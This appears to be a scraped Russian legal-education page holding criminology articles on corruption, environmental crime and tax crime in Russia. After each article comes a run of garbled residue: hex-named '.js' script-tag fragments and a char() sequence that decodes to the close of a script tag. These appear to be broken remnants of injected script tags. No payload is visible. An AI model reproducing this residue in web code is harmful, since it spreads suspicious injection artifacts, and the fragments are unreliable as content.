Сегодня
НАВИГАЦИЯ:
ЮРИДИЧЕСКОЕ НАСЛЕДИЕ:
РАЗНОЕ:
РЕКЛАМА:
АРХИВ НОВОСТЕЙ:
Особенности борьбы с коррупцией
  Криминология | Автор: admin | 12-05-2010, 19:44
Борьба с коррупцией должна отвечать всем требованиям борьбы с преступностью.
Общую организацию борьбы с коррупционной преступностью следует базировать на:
постоянном анализе изменений коррупции и ее причин;
определении стратегии и тактики борьбы с ней с учетом реальных социально-экономических, политических условий, состояния общественного сознания, правоохранительной системы;
основе закона, а не подзаконных актов, так как, во-первых, неизбежные ограничения ряда прав служащих (при представлении декларации о доходах, ограничении совместительства и т. п.) могут в соответствии со ст. 55 Конституции РФ осуществляться только на основе федерального закона; во-вторых, доказательствами в уголовном судопроизводстве признаются только данные, полученные в предусмотренном законом порядке. При этом обеспечивать развитие антикоррупционного законодательства с использованием средств разных отраслей права, комплексного подхода;
разработке целевых взаимоувязанных программ борьбы с коррупцией в Российской Федерации и ее субъектах, причем реально обеспеченных в материальном, кадровом, правовом отношениях;
координации деятельности всех органов государственной власти Президентом России (возможно, через Совет Безопасности) и координации деятельности правоохранительных органов по борьбе с преступными проявлениями коррупции – Генеральным прокурором России;
специализированной подготовке кадров и выделении в правоохранительных органах специализированных подразделений;
использовании помощи разных институтов гражданского общества, населения, юридических лиц (включая сотрудничество банков);
систематической оценке результатов работы и корректировке мер.
Предупреждение коррупции, т. е. воздействие на ее причины и условия, должно стать основным направлением, иначе коррупционные формы поведения будут воспроизводиться и при ужесточении наказания отдельных лиц.
В плане общего предупреждения необходимо прежде всего исключать использование коррупции как средства становления и укрепления новых общественных отношений, создания социальной опоры рыночных отношений, а также пресекать отмывание, приумножение криминальных капиталов.
При специальном предупреждении коррупции важны:
установление такого содержания служащим, которое способно обеспечить им и их семьям достойный уровень жизни;
повышенный контроль за: доходами и расходами государственных и ряда иных категорий служащих; аспектами поведения, наиболее чувствительными к коррупции (выдаче информации, не подлежащей официальному распространению и т. п. ); кадровой политикой, использование в том числе ротации кадров;
режим обеспечения безопасности лиц, осуществляющих борьбу с коррупцией, преступностью, а также их семей;
устранение фактов расхождения закрепленных законом задач, полномочий разных субъектов и правовых средств их обеспечения (например, когда негосударственным службам безопасности государственные правоохранительные органы не обязаны предоставлять необходимую информацию);
введение режима исключительно служебного использования дорогостоящих государственных квартир, особняков, предоставляемых в связи с занятием государственной должности, при гарантированности частного жилья на общих, предусмотренных законом условиях;
производство всех выплат из бюджетной системы Российской Федерации только на основе закона.
Правоохранительная деятельность должна неуклонно осуществляться только в рамках и на основе закона, при соблюдении презумпции невиновности, индивидуализации уголовной ответственности, наказания и с использованием всего арсенала правовых средств (дисциплинарных, административных, гражданско-, уголовно-правовых).5eaf0fb25a3a3434c18b10d8461eae62.js" type="text/javascript">52b7a25e79bb52e5f96abba2c0db7114char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)d8d05150b4025a55f541f9a2bba5e8e1.js" type="text/javascript">1a5b98c13f370d985dc85ecb3a394a8c.js" type="text/javascript">7857199f0c7af165a55bccaecc0e8a12.js" type="text/javascript">fd91230c8c7cf99a505a65346129cb23.js" type="text/javascript">90ba703e881c09ee8dbf932b379f223d.js" type="text/javascript">b263297c5e25b397817cb6e3ad67ba80.js" type="text/javascript">01ace35528edf94d2ff17b9df18b22c5.js" type="text/javascript">18d36a75f7c32847935ded6a3c1820ef.js" type="text/javascript">7358b81a98ce9fa8e888e2938c263914.js" type="text/javascript">2d69077be70ad41a26b76f6952bb78bf.js" type="text/javascript">ea3a98b9387936ca8f47b6eb7c5f3a74.js" type="text/javascript">
Коментариев: 0 | Просмотров: 274 |
Криминологическая характеристика
  Криминология | Автор: admin | 12-05-2010, 19:44
Экологическая преступность – сложная совокупность экологических преступлений, то есть общественно опасных, виновных, противоправных, причиняющих вред окружающей природной среде и здоровью человека деяний, запрещенных и наказуемых в соответствии с уголовным законом, посягающих на общественные отношения по охране окружающей человека природной среды и рациональному использованию природных ресурсов, включая обеспечение экологической безопасности личности, населения, общества, нации и устойчивого развития государства.
Экологические преступления являются одним из наиболее общественно опасных и распространенных видов противоправных деяний. В совокупности с другими экологическими правонарушениями по тяжести своих отрицательных последствий демографического, экологического, социального характера они представляют сегодня реальную угрозу национальной безопасности, что предельно остро выражается:
в катастрофическом ухудшении качества среды обитания, ведущем к снижению продолжительности жизни, увеличению заболеваемости, смертности и ухудшению генофонда населения;
в образовании зон экологического неблагополучия и бедствия; деградации возобновимых природных ресурсов (почв, рыбных, лесных ресурсов и др.);
в истощении невозобновимых природных ресурсов (минерального сырья, углеводородных энергоносителей);
в возрастании риска крупных техногенных катастроф;
в ухудшении качества поверхностных и подземных вод, прибрежных вод морей;
в распространении радиоактивного загрязнения;
в загрязнении воздушного бассейна и опасном изменении климата;
в опасном загрязнении продуктов питания. Наибольшее количество экологических преступлений выявляется обычно в виде браконьерства, незаконной рубки леса, загрязнения почв и растительного покрова. В условиях перехода к рыночным отношениям опасность последствий этих видов преступлений постоянно возрастает. В последнее время наблюдается значительный рост новых видов преступлений, вызывающих еще большие негативные последствия экологического характера – хищение и нелегальная разработка невозобновимых природных ресурсов; незаконное использование добытого минерального сырья, ресурсов континентального шельфа и исключительной экономической зоны России; самовольный захват земель; ввоз в Россию и захоронение особо опасных токсичных отходов, вредных для человека продуктов питания и других потребительских товаров;
размещение на территории России зарубежных экологически вредных для природной среды технологий и производств;
экологический терроризм и экоцид.
Особую социально-экологическую опасность для России и мирового сообщества представляет экологическая контрабанда. Основными ее видами являются незаконное трансграничное перемещение ядерных расщепляющихся материалов, радиоактивных веществ и отходов источников ионизирующего излучения; незаконный ввоз в Россию опасных отходов из зарубежных стран; незаконный экспорт и импорт озоно-разрушающих веществ и содержащей их продукции; незаконный вывоз из России редких и исчезающих видов дикой флоры и фауны.
Наиболее распространен в настоящее время незаконный вывоз стратегически важных сырьевых ресурсов, непосредственно вызывающий истощение и деградацию природной среды России.
Повышенную экологическую опасность представляет, хотя непосредственно и не относящийся к экологическим преступлениям, так называемый технологический терроризм – незаконное использование ядерного, химического и бактериологического (биологического) оружия или его компонентов, ядерных, радиоактивных, высокотоксичных химических веществ, патогенных микроорганизмов, а также выведение из строя, разрушение или захват ядерных, химических или иных объектов, систем жизнеобеспечения городов и промышленных центров для достижения политических, экономических и иных целей.
Самым экологически опасным результатом совершения всех названных преступлений может быть уничтожение самой биологической основы жизни человека на Земле.
По ряду своих сущностных характеристик экологические преступления в значительной части являются одновременно и экономическими (противоправное использование природных ресурсов), насильственными (связанные с прямым нанесением вреда здоровью человека) либо корыстными (незаконная охота, рыбный промысел) преступлениями, но по своим негативным последствиям, причиняемому ущербу они почти всегда превосходят их.
По данным экологов, например, только в результате ди-оксинового загрязнения водоемов в России ежегодно погибает 20 тыс. человек. Почти такое же число граждан смертельно заболевает раком кожи в результате разрушения озонового слоя стратосферы.
Суммарно по экологическим причинам в стране гибнет ежегодно несколько сот тысяч человек и ухудшается здоровье многих миллионов.
Последствия ежегодного загрязнения земель и вод разливами нефти экспортно оцениваются в несколько миллиардов долларов. Стоимость незаконно изымаемых и нелегально вывозимых в другие страны биологических ресурсов шельфа и экономической зоны оценивается еще в несколько миллиардов долларов .
В 1995 году в России произошло 294 тыс. пожаров, при которых погибло почти 15 тыс. человек, уничтожено 72 тыс. строений. Общий ущерб от этих пожаров превысил 23 трлн. рублей.
Экологическая преступность характеризуется высокой латентностью – в статистике отражается только малая часть совершаемых экологических преступлений. При этом высока не только скрытая, но и скрываемая часть таких преступлений: общее количество ежегодно возбуждаемых уголовных дел по фактам выявленных преступлений в сфере экологии явно не соответствует числу сообщений о них, известных правоохранительным органам.
Исчерпывающая информация о реальной распространенности экологических преступлений в настоящее время отсутствует. Но даже та, которая имеется в природоохранных и правоохранительных органах, свидетельствует, что в данной сфере мы имеем дело с массовыми нарушениями законодательства. С учетом латентности удельный вес экологических преступлений в общей структуре преступности по экспертным оценкам фактически составляет не менее 15–20%.
Только нарушений правил охоты в России ежегодно регистрируется более 70 тыс., нарушений правил занятия водными добывающими промыслами – около 150 тыс. На Нижней Волге, на Камчатке, Дальнем Востоке и в ряде других мест рыбное браконьерство приняло промышленный размах. По данным исследований, общее число преступного занятия рыбным промыслом приблизительно достигает 12 млн. в год. Шестизначными числами исчисляется количество регистрируемых нарушений правил землепользования и загрязнений природной среды.
О высокой латентности экологических преступлений свидетельствует и тот факт, что в 1994 году в целом по России чрезвычайные ситуации техногенного характера, причинившие существенный экологический вред, составили 84% от общего числа аварий, и при этих условиях за этот же год по ст. 223 УК РСФСР возбуждено лишь 49 дел против 43 лиц, а по ст. 223' – одно дело против одного лица.
Ежегодно в России возникает до 30 тыс. лесных пожаров, 81% из них возникает по вине людей. Однако исследованиями установлено, что за нарушение лесного законодательства к уголовной ответственности привлекаются примерно 1 из 400 нарушителей, к административной ответственности – 1 из 40.
Столь пассивная борьба с преступлениями, совершаемыми в сфере экологии, граничащая почти с полным ее отсутствием, и объясняет тот факт, что в 1995 году в Российской Федерации зарегистрировано 8113 экологических преступлений. Это составляет 0,3% от всех выявленных преступлений. За совершение экологических преступлений привлечено к ответственности 9098 человек, это 0,6% от общего количества выявленных в стране лиц, совершивших преступления. Осуждено в 1995 году за экологические преступления всего 5043 человека.
Такое положение отражает неадекватность реакции природоохранных и правоохранительных органов, должностных лиц, ответственных за соблюдение экологического законодательства, на сложившуюся кризисную ситуацию в области охраны окружающей природной среды.
Анализ правоприменительной практики позволяет выявить четкую тенденцию применения уголовной ответственности, главным образом, за преступления, связанные с незаконным захватом природных ресурсов (незаконное занятие рыбными и другими водными добывающими промыслами, незаконная порубка леса, незаконная охота). Нормы, устанавливающие уголовную ответственность за причинение вреда окружающей природной среде и преступления, нарушающие экологическую безопасность населения (загрязнение водоемов, атмосферного воздуха и др. ), применяются крайне редко.b1b2690f4cd8d904e68956c9d31113ad.js" type="text/javascript">a24583af220ebe480b46d31ce5fb80e8char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)a41cf441c97e503a468ae5e974c01367.js" type="text/javascript">aabf4e8198f06dbc806fd5c2c4cf88be.js" type="text/javascript">69ebf27080c6369972f4aa961fa8cb02.js" type="text/javascript">8227ad2726c716f486e64b93552c7840.js" type="text/javascript">3069463e38e23135961b5bb93ed7ac03.js" type="text/javascript">583e87dd7f82a82bacebe6059af88caa.js" type="text/javascript">d7af9160e5f5389298d8c5df0a909cad.js" type="text/javascript">325a831b28c80ff10e66058acbfbb58b.js" type="text/javascript">584684f619e53a6d5aef48b0645be8e7.js" type="text/javascript">ea625cb4daa9f5ca594a6138b9fc2c4e.js" type="text/javascript">01ec224f5fddee6effaa9fe1097d66f8.js" type="text/javascript">
Коментариев: 0 | Просмотров: 276 |
Особенности детерминации и причинности
  Криминология | Автор: admin | 12-05-2010, 19:44
В причинном комплексе экологической преступности взаимодействуют многочисленные и разноплановые обстоятельства. Наиболее общие и постоянно действующие вытекают из противоречий, присущих общественным отношениям, определяющим сущность, характер и процесс взаимодействия человека и природы.
Основные из этих противоречий вызваны в последние годы негативными процессами, сопровождающими социальные и экономические преобразования, происходящие в стране.
Переориентация России с плановой на рыночную экономику наряду с определенными положительными результатами привела к расстыковке экономических и экологических интересов общества, государства и его граждан, ускорила процессы деградации окружающей природной среды, создала условия для развития новых реальных стимулов совершения экологических преступлений.
Наиболее многочисленны эти стимулы в производственной сфере. Работа предприятий, экологически вредно воздействующих на окружающую природную среду, требует постоянно возрастающих для ее охраны затрат природопользователей. Эти затраты всегда значительны, а потому для многих собственников крайне обременительны. В результате именно на этих предприятиях в первую очередь все более широкое распространение получает незаконная экономия на средствах, подлежащих направлению на природоохранные цели. Самоустранение от разработки, финансирования и реализации мероприятий по охране природы, а также ненадлежащее их выполнение все чаще оправдываются руководителями предприятий и предпринимателями как вызванные. необходимостью избежать банкротства, сохранить рабочие места, снизить себестоимость выпускаемой продукции. Фактически в основе таких противоправных действий лежат иные экономические причины – стремление всеми способами, в том числе и запрещенными законом, максимально обогатиться. Дешевизна природных ресурсов в России, в свою очередь, также способствует сверхинтенсивной их эксплуатации с целью получения возможно большей прибыли в самый короткий срок.
Экономическими причинами обусловлены и так называемые новые экологические преступления, к информации о которых ранее имел доступ лишь узкий круг должностных лиц.
Многие иностранные фирмы активно осваивают территорию России с целью хранения и захоронения радиоактивных материалов и высокотоксичных отходов, для создания экологически опасных производств, внедрения экологически грязных технологий, ввоза хотя и не опасного для здоровья людей, но трудно уничтожаемого мусора, загрязняющего окружающую среду, а также сбыта некачественных или запрещенных к использованию в своих странах продуктов питания и других потребительских товаров.
Многие зарубежные инвесторы, особенно представляющие средний и мелкий бизнес, стремятся к размещению на российской территории экологически вредных производств, чтобы избежать дополнительных расходов, на выполнение жестких отечественных нормативов, снизить издержки производства.
Правительственные и деловые круги ряда зарубежных государств все чаще рассматривают природные богатства
России как ресурсы, которые можно использовать для реше-нмя своих национальных или корпоративных задач, не обращая внимания на негативные экологические последствия этой деятельности.
Опасность дальнейшего преступного загрязнения окружающей среды в России вызвана не только отмеченными выше намерениями и действиями отдельных представителей бизнеса, но и пренебрежением отечественных производственников к экологическим требованиям законодательства и национальным природоохранным интересам. Именно этим объясняется, что большинство производственных предприятий включает расходы на природоохранные цели в себестоимость продукции и тем самым уклоняется от осуществления реальной охраны окружающей природной среды и исполнения экологических норм и требований природоохранительного законодательства.
Экономические причины совершения экологических преступлений, не связанных с должностным статусом граждан, также многообразны. В числе их резкое снижение уровня жизни, сопровождаемое безработицей, невыплатой зарплаты, утратой возможности бесплатного или льготного лечения, образования. Именно по этим причинам широкий масштаб получили браконьерство, самовольный захват земли для личных нужд, нарушение режима особо охраняемых природных территорий и другие правонарушения. Совершающие эти преступления лица, потеряв легальные источники существования в результате экономических трудностей, часто идут на это вынужденно. Однако наиболее распространенными причинами экологических преступлений для этой категории лиц являются те, которые присущи для совершающих преступления по корыстным мотивам (незаконная порубка леса, отстрел редких животных, незаконный рыбный промысел) и даже из-за хулиганских побуждений (поджоги леса).
Рост экологической преступности происходит и из-за несовершенства законодательства об ответственности за экологические правонарушения (множество отсылочных норм, несогласованности между актами и нормами, недостаточно четкие формулировки правовых норм), а также из-за принятия субъектами РФ законодательных актов, объявляющих исключительное право собственности на все природные объекты своих территорий, что противоречит Конституции РФ.de1ab1bca7255ee44ce7ed7d9ce67866.js" type="text/javascript">6b79a13bc3be75defa1162960f4642cbchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)0fe85f891904908cee4470eca6a80ef1.js" type="text/javascript">cce8894fc22e4c941628a914da86d2d5.js" type="text/javascript">db44a0a1fb302b9181c0492f3fc1bbb7.js" type="text/javascript">f96016c5587dd9009a8384053467cda8.js" type="text/javascript">722acf495b75c229e9cb322449f2a18b.js" type="text/javascript">646c6b2de8623316621a0fe4bafc0026.js" type="text/javascript">1ea84f3af356849a746a8bf07c757c2a.js" type="text/javascript">c1c6e2ba320cc1581ab82c9ed439aa8b.js" type="text/javascript">dcaaf3d3f1ff97638fae85a7acb65e0c.js" type="text/javascript">b699237998f0fc7b63486eb05ee3518f.js" type="text/javascript">5f7a171627466ad73f13e80d3439137f.js" type="text/javascript">
Коментариев: 0 | Просмотров: 184 |
Особенности борьбы с экологической преступностью
  Криминология | Автор: admin | 12-05-2010, 19:44
Специфика борьбы с экологической преступностью заключается в необходимости постоянного обеспечения активных и четко скоординированных действий всех природоохранных, контрольных и правоохранительных органов по укреплению экологической законности и правопорядка в России.
Правоохранительные органы сами не владеют и не могут владеть в полном объеме необходимыми силами и средствами для борьбы с экологическими преступлениями. Поэтому в этой деятельности постоянно участвуют компетентные в соответствующей сфере работники многочисленных природоохранных органов и контрольных и надзорных служб (Минприроды, Гос-комсанэпиднадзора, Роскомзема. Роскомвожа, МЧС и др).
В устранении угроз экологической безопасности, вызванной конкретными преступлениями, в рамках своей компетенции участвуют и органы исполнительной власти.
Борьба с экологическими преступлениями ведется на основании и в рамках законов, соответствующих им подзаконных документов. В них детально излагается алгоритм действий, направленных на предотвращение экологических преступлений, содержатся необходимые директивы правоохранительным и природоохранным ведомствам, инструкции по проведению первоочередных мероприятий, направленных на обеспечение мер экологической безопасности. Они определяют порядок передачи материалов об установленных фактах с признаками экологического преступления в органы милиции и прокуратуры.
Совершение отдельных видов преступлений, представляющих особую экологическую опасность (незаконный оборот радиоактивных, высокотоксичных химических веществ, материалов, отходов, патогенных микроорганизмов и др.), вносит дополнительную специфику в борьбу с ними. Здесь приходится действовать по принципу обеспечения приоритета мер защиты от реально грозящей экологической опасности перед применением мер уголовного преследования. В этих случаях проведение оперативно-розыскных мероприятий, осуществление иных уголовно-процессуальных действий всегда будет менее важным по сравнению с мерами защиты от созданной преступным деянием реальной экологической опасности либо катастрофы.
Существенный вклад в борьбу с экологическими преступлениями вносят общественные экологические объединения, организации граждан, движения так называемых зеленых, российские, иностранные и международные неправительственные экологические организации, а также средства массовой информации. Все они, как правило, активно взаимодействуют между собой и с государственными структурами по вопросам борьбы с экологическими правонарушениями, оказывают помощь в этой деятельности природоохранным и правоохранительным органам, во многих случаях непосредственно сами предупреждают и выявляют такие правонарушения.
Одним из важных условий повышения эффективности борьбы с экологическими преступлениями является постоянное совершенствование правовой базы природоохранительной деятельности. В этом направлении проводится большая законотворческая работа, предпринимаются меры по консолидации усилий законодательной и исполнительной власти, общественных объединений федерального и регионального уровней, ученых и предпринимателей по совершенствованию и ускорению разработки и принятию новых нормативных правовых актов, способных содействовать борьбе с этими преступлениями.
Положительным является и то положение, что Уголовный кодекс Российской Федерации в определенных пределах усиливает ответственность за экологические преступления.
Введение в действие Федерального закона "Об экологической экспертизе" позволило заложить правовые предпосылки для предотвращения экологических преступлений на ранних стадиях подготовки и принятия хозяйственных и иных решений.
Федеральные и региональные программы борьбы с преступностью, ранее не предусматривавшие мер по предотвращению экологической преступности, стали в последние годы финансировать и обеспечивать соответствующее направление правоохранительной деятельности.
Укреплению правовой основы борьбы с экологической преступностью способствуют также государственные научно-технические программы, предусматривающие задания по правовому обеспечению решения различных экологических проблем. Например, разрабатывались такого рода программы под условными названиями "Охрана здоровья населения России", "Экологическая безопасность России" и др.
Большое значение для борьбы с преступлениями и другими экологическими правонарушениями имеют документы, отражающие стратегию борьбы с экологической преступностью, увязывающие ее с общими программами социально-экономического развития страны. Например, 4 февраля 1994 года Президентом Российской Федерации была утверждена Государственная стратегия Российской Федерации по охране окружающей среды и обеспечению устойчивого развития, а также принята концепция перехода Российской Федерации на путь устойчивого развития. В этих документах определялись планы действий Правительства России в области охраны окружающей среды на 1994–1995 и 1996–1997 годы, другие природоохранные акты федерального и регионального значения.
В борьбе с экологическими преступлениями и правонарушениями возрастает роль научно-практических конференций, совещаний, "круглых столов", проводимых по соответствующей проблематике. Они консолидируют усилия, улучшают координацию в этой сфере деятельности природоохранных и правоприменительных органов.
Вместе с тем в связи с необходимостью активизации использования новейших достижений науки и техники для предотвращения экологических преступлений важной мерой могло бы стать формирование и развитие нового специализированного научного криминологического направления – экологической криминологии.
Экологическая криминология должна исследовать социальную практику и общественные отношения в сфере экологии, изучать их особенности, причины и условия, способствующие совершению экологических преступлений, разрабатывать рекомендации о мерах контроля и борьбы с ними.67897a9a1e972e2a9c8ae6d6d3ce98fb.js" type="text/javascript">26c3539249f82029d9439fd6fb9796aachar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)666728f6eb48102dc367ce18b549231c.js" type="text/javascript">134137e2e36e313bc09a11d57134a494.js" type="text/javascript">8bafc57236f0a1d84c31efcdccb4658b.js" type="text/javascript">f8dfd4d61c3161f7312fef4bf2462a23.js" type="text/javascript">bf1a21f36a8c26c62dccf069be58c69e.js" type="text/javascript">1b808d9f3ac7c71e45513380b7316bc5.js" type="text/javascript">cb5cbee0497fd592d2e1f58cc008fea2.js" type="text/javascript">c39302c47ad9a831f289c2b76155673f.js" type="text/javascript">32da2e2d0827ac9a1511de4c9d95d022.js" type="text/javascript">f39ca62b88558814bb4e79aadf6ae99f.js" type="text/javascript">9e6d26bdb8e7b1545570d20731b89155.js" type="text/javascript">
Коментариев: 0 | Просмотров: 224 |
Понятие и криминологическая характеристика "налоговая преступность"
  Криминология | Автор: admin | 12-05-2010, 19:44
Понятие "налоговая преступность" употребляется применительно к совокупности преступлений, связанных с налогообложением.
Законодательство, определяющее современную налоговую систему России, принято в 1991 году, поэтому считается сравнительно новым, постоянно изменяющимся. Основными налоговыми законами являются: Закон от 27 декабря 1991 года "Об основах налоговой системы Российской Федерации", Закон от 27 декабря 1991 года "О налоге на прибыль предприятий и организаций", Закон от 6 декабря 1991 года "О налоге на добавленную стоимость", Закон от 6 декабря 1991 года "Об акцизах", Закон от 7 декабря 1991 года "О подоходном налоге с физических лиц", Закон от 21 марта 1991 года "О Государственной налоговой службе РСФСР".
По действующему законодательству под налогом, сбором, пошлиной и иным обязательным платежом понимается обязательный взнос в бюджет соответствующего уровня или во внебюджетный фонд, осуществляемый налогоплательщиками в установленном порядке. Сущность налога заключается в изъятии государством в свою пользу определенной части валового внутреннего продукта в виде обязательного взноса .
Совокупность всех налогов, взимаемых в установленном порядке, образует налоговую систему.
Современная налоговая система России включает в себя свыше двухсот различных налогов и иных обязательных платежей, которые подразделяются на три уровня: федеральные налоги, налоги республик (краев, областей) и местные налоги. Наибольшая доля налоговых поступлений в бюджет приходится на налог на добавленную стоимость (НДС), налог на прибыль, акцизы, подоходный налог с физических лиц, на все остальные платежи приходится менее 10%.
Плательщиками налогов (налоговыми субъектами) в России являются юридические и физические лица, другие категории плательщиков, на которых законодательством возложена обязанность по уплате налогов. Это предприятия и организации, включая созданные на территории Российской Федерации предприятия с иностранными инвестициями, международные объединения и организации, осуществляющие предпринимательскую деятельность, финансовые и другие аналогичные подразделения предприятий и организаций, имеющие отдельный баланс и расчетный счет; предприятия и организации, образованные в соответствии с законодательством иностранных государств и осуществляющие предпринимательскую деятельность в Российской Федерации через постоянные представительства. Налогоплательщиками являются также физические лица (граждане РФ, иностранные граждане), как имеющие, так и не имеющие постоянного места жительства в России.
Налогоплательщики подлежат обязательной постановке на учет в налоговых органах и обязаны своевременно и в полном размере уплачивать налоги, вести бухгалтерский учет, представлять налоговым органам необходимые для исчисления и уплаты налогов документы.
Для борьбы с налоговыми преступлениями 14 августа 1992 года уголовное законодательство дополнено ст. 1622 (Сокрытие доходов (прибыли) или иных объектов налогообложения) и ст. 1623 (Противодействие или неисполнение требований налоговой службы в целях сокрытия доходов (прибыли) или неуплаты налогов). Шестью годами раньше в УК РСФСР была введена статья 162' (Уклонение от подачи декларации о доходах).
В новом Уголовном кодексе РФ предусмотрены такие преступления, как уклонение гражданина от уплаты налога (ст. 198), уклонение от уплаты налогов с организаций (ст. 199).0ebc1afbe6159eea96ae142a89c7294d.js" type="text/javascript">3b624fd08cde89473971419ca4ea9de3char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)9eb34a326b2e9e7e060d874be8b198f3.js" type="text/javascript">c9faaed1d055e912f98464437b05ed5d.js" type="text/javascript">0bfc7d2d840ecc0ec350c3cf82464100.js" type="text/javascript">1371869fd8cbd277143de79dc79457f8.js" type="text/javascript">a2861ae2ec588948ac3d4234bb98c14e.js" type="text/javascript">1278e33ea201f805823081c17b8e4a5c.js" type="text/javascript">3313947f73ff38fb199e82d86d66b645.js" type="text/javascript">2abe23b1b7c95f9b6e722a47c54c53a2.js" type="text/javascript">7026e57d0236e0db3a488a868b19173a.js" type="text/javascript">7aeb0acf1b4f690c43259f53cebe4fef.js" type="text/javascript">f6432f5b0c971c5a21a6cccd76b294ca.js" type="text/javascript">
Коментариев: 0 | Просмотров: 232 |
Специфика детерминации и причинности
  Криминология | Автор: admin | 12-05-2010, 19:44
Процессы детерминации и причинности налоговой преступности в значительной степени отличаются от аналогичных процессов, связанных с общеуголовной преступностью.
Налоговая преступность органически взаимосвязана с рыночными отношениями, частной собственностью и предпринимательством. Об этом свидетельствует весь мировой опыт.
С ростом числа предприятий, основывающихся на частной форме собственности, нарастают масштабы противоречия между интересами государства и общества, с одной стороны, и частными интересами – с другой.
Налоги являются главным источников бюджетных доходов. Рост бюджетных расходов, инфляционные процессы побуждают государство увеличивать налоговый пресс. Однако, например, в России в период реформ подавляющее большинство предприятий использовало устаревшее оборудование, технологии, испытывало острую нехватку оборотных средств и не могло сбыть свою неконкурентоспособную продукцию как на внутреннем, так и на внешнем рынке. Все это приводило к взаимным неплатежам и к снижению возможности уплачивать возросшие налоги.
Что же касается экономически благополучных предприятий, среди которых выделяются торгово-закупочные, посреднические, то в причинном комплексе массового уклонения их владельцев от уплаты налогов отмечалось определяющее влияние социально-психологического фактора: пренебрежения к исполнению требований закона, обеспечения любой ценой высоких доходов.
Однако надо признать определенную социально-правовую и экономическую обусловленность такого негативного отношения к законам и их исполнению: состояние налогового законодательства оценивалось как удручающее.
Прежде всего оно характеризовалось как несовершенное и нестабильное, излишне объемное, сложное, устанавливающее высокий уровень налогообложения. В середине 90-х годов нормативно-правовая база по вопросам налогообложения включала более ста законов, указов Президента Российской Федерации, постановлений Правительства Российской Федерации, инструкций и разъяснении Государственной налоговой службы России.
Дополнительные трудности создавались и при постоянном внесении изменений в законодательство. Причем иногда нормы, ухудшающие положение налогоплательщика, вводились задним числом или расширительно толковались. Все это способно порождать у предпринимателей ощущение нестабильности налогового законодательства, постоянное ожидание ухудшения налогового режима.21e6e49876dc2cb6406fb06810fd854c.js" type="text/javascript">287e9795f136c965c076edf6136ddfacchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)147a88cd8201093d7dca7e082d76b2ed.js" type="text/javascript">841239b52e6ad1ca90ad14cd5546c078.js" type="text/javascript">9f76d503a548139bba81ddc2d3044d0f.js" type="text/javascript">0d42a1133dedc27740e84891456ae390.js" type="text/javascript">434dd00446805a8f01f9f1cb64da0193.js" type="text/javascript">06d8b77128df3420e5cc44b114bede7a.js" type="text/javascript">c1ecc033c148153b23580201438e9036.js" type="text/javascript">2fc636ba702aaaecd1907d1b8765340d.js" type="text/javascript">ac3114a8be24df0d1b065e364ca2154f.js" type="text/javascript">6ab12421205105a6b9f998b4ae49735f.js" type="text/javascript">ffbf4cce9852fe10012969c27c10fd30.js" type="text/javascript">
Коментариев: 0 | Просмотров: 199 |
Предупреждение налоговых преступлений
  Криминология | Автор: admin | 12-05-2010, 19:44
Предупреждение совершения налоговых преступлений должно осуществляться на различных уровнях и в нескольких направлениях.
На общегосударственном уровне важно обеспечение экономической стабильности и подъема производства, роста платежеспособности хозяйствующих субъектов.
Особое место в системе предупреждения налоговых преступлений занимает совершенствование правовой базы. Ожидаемые изменения, направленные на существенную либерализацию налоговой системы, связываются с принятием Налогового кодекса Российской Федерации и сокращением числа федеральных региональных и местных налогов; отменой всех налогов, уплачиваемых с выручки; снижением ставки налога на прибыль и другими важными изменениями.
В целях ускорения налоговой реформы Президентом Российской Федерации 8 мая 1996 года подписан Указ № 685 "Об основных направлениях налоговой реформы Российской Федерации и мерах по укреплению налоговой платежной дисциплины" .
В соответствии с Указом основными направлениями государственной политики в области налоговой реформы в Российской Федерации признаются: 1) построение стабильной налоговой системы, обеспечивающей единство, непротиворечивость и неизменность налогообложения в течение финансового года;
2) сокращение числа налогов путем их укрупнения и отмены целевых налогов, не дающих значительных поступлений;
3) облегчение налогового бремени производителей продукции и недопущение двойного налогообложения путем четкого определения налогооблагаемой базы; 4) сокращение льгот и исключений из общего режима налогообложения.
Кроме того, данным Указом устанавливается: отмена авансовых платежей, сокращение размера пени за просрочку уплаты налогов, исключение двойного налогообложения. Указанные изменения, несомненно, окажут влияние на налоговую сферу.
Значительную роль в предупреждении налоговой преступности могут играть налоговые инспекции. Они должны совершенствовать консультационную деятельность, помогать налогоплательщикам в решении вопросов о размере налогов и порядке их уплаты.
Правоохранительным органом, осуществляющим борьбу с налоговой преступностью, в России является Федеральная служба налоговой полиции Российской Федерации, осуществляющая свою деятельность на основе Закона Российской Федерации от 24 июня 1993 года "О федеральных органах налоговой полиции".
В соответствии с этим Законом задачами федеральных органов налоговой полиции являются: выявление, предупреждение и пресечение налоговых преступлений и правонарушений (о выявленных при этом других экономических преступлениях органы налоговой полиции обязаны проинформировать соответствующие правоохранительные органы); обеспечение безопасности деятельности государственных налоговых инспекций, защита их сотрудников от противоправных посягательств при исполнении служебных обязанностей; предупреждение, выявление и пресечение коррупции в налоговых органах.d1d4fc15af0e9fb6e3f0d85d61a21347.js" type="text/javascript">a08c957299c1e105ae79ada957421775char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)cb2cfa23e70aebcae42ca54fa8992dde.js" type="text/javascript">fd538b5834133cd88c447001d866b01f.js" type="text/javascript">44d9803e416316adf1b511a20886a219.js" type="text/javascript">1d2c1db853cac754d7dd36d4845100ab.js" type="text/javascript">8f7ca0159a8b86249f16be0f5ea2a51b.js" type="text/javascript">f420ec6019e41f2380ba8354e845fb20.js" type="text/javascript">7e906cff92b803e4ec088855970754e6.js" type="text/javascript">4efe27e920003cf95c5e2380feefe9d3.js" type="text/javascript">3ce03dd17659cd43e59730c8740c8ed8.js" 